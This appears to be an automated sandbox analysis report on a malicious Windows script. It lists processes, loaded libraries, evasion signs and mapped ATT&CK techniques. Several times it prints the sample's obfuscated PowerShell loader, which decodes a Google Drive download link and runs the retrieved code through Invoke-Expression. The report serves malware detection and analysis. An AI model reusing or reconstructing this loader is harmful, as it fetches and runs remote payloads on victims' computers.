Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. 
Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be j
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\kartotekskorts.Vrd && echo $"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: e.pdb#K source: powershell.exe, 00000002.00000002.2193820727.0000017EB8F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb`T]e source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbion* 1TX]d source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241435011.0000017ED30C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbK source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbo source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb|XEd source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb^C source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2241435011.0000017ED30C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbip source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("POWERSHELL "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakke", "0")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: $Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. 
Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be jl$DeklaSmart,aRefredEs,ereNe erl Ve.tm .ekla Blotg UsdeeIndverForstvAmanurNubi.k EutrsGigabt UnsceStilndDeliqe PrectPic
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. 
Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be j
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD348900BD pushad ; iretd 2_2_00007FFD348900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34896F87 push esp; retf 2_2_00007FFD34896F88
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4711
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5177
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6912 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: powershell.exe, 00000002.00000002.2241435011.0000017ED30C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWVi%SystemRoot%\system32\mswsock.dlleg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be jl$DeklaSmart,aRefredEs,ereNe erl Ve.tm .ekla Blot
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. 
Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be jJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\kartotekskorts.Vrd && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Reconnaissance:
  • Gather Victim Identity Information
  • Credentials
  • Email Addresses
  • Employee Names
  • Gather Victim Network Information
  • Domain Properties
Resource Development:
  • Scripting (221)
  • Domains
  • DNS Server
  • Virtual Private Server
  • Server
  • Botnet
Initial Access:
  • Valid Accounts
  • Default Accounts
  • Domain Accounts
  • Local Accounts
  • Cloud Accounts
  • Replication Through Removable Media
Execution:
  • Command and Scripting Interpreter (11)
  • Exploitation for Client Execution (1)
  • PowerShell (2)
  • Cron
  • Launchd
  • Scheduled Task
Persistence:
  • Scripting (221)
  • DLL Side-Loading (1)
  • Logon Script (Windows)
  • Login Hook
  • Network Logon Script
  • RC Scripts
Privilege Escalation:
  • Process Injection (11)
  • DLL Side-Loading (1)
  • Logon Script (Windows)
  • Login Hook
  • Network Logon Script
  • RC Scripts
Defense Evasion:
  • Masquerading (1)
  • Virtualization/Sandbox Evasion (21)
  • Process Injection (11)
  • Obfuscated Files or Information (2)
  • Software Packing (1)
  • DLL Side-Loading (1)
Credential Access:
  • OS Credential Dumping
  • LSASS Memory
  • Security Account Manager
  • NTDS
  • LSA Secrets
  • Cached Domain Credentials
Discovery:
  • Security Software Discovery (1)
  • Process Discovery (1)
  • Virtualization/Sandbox Evasion (21)
  • Application Window Discovery (1)
  • File and Directory Discovery (1)
  • System Information Discovery (12)
Lateral Movement:
  • Remote Services
  • Remote Desktop Protocol
  • SMB/Windows Admin Shares
  • Distributed Component Object Model
  • SSH
  • VNC
Collection:
  • Archive Collected Data (1)
  • Data from Removable Media
  • Data from Network Shared Drive
  • Input Capture
  • Keylogging
  • GUI Input Capture
Command and Control:
  • Encrypted Channel (11)
  • Ingress Tool Transfer (1)
  • Non-Application Layer Protocol (2)
  • Application Layer Protocol (13)
  • Fallback Channels
  • Multiband Communication
Exfiltration:
  • Exfiltration Over Other Network Medium
  • Exfiltration Over Bluetooth
  • Automated Exfiltration
  • Traffic Duplication
  • Scheduled Transfer
  • Data Transfer Size Limits
Impact:
  • Abuse Accessibility Features
  • Network Denial of Service
  • Data Encrypted for Impact
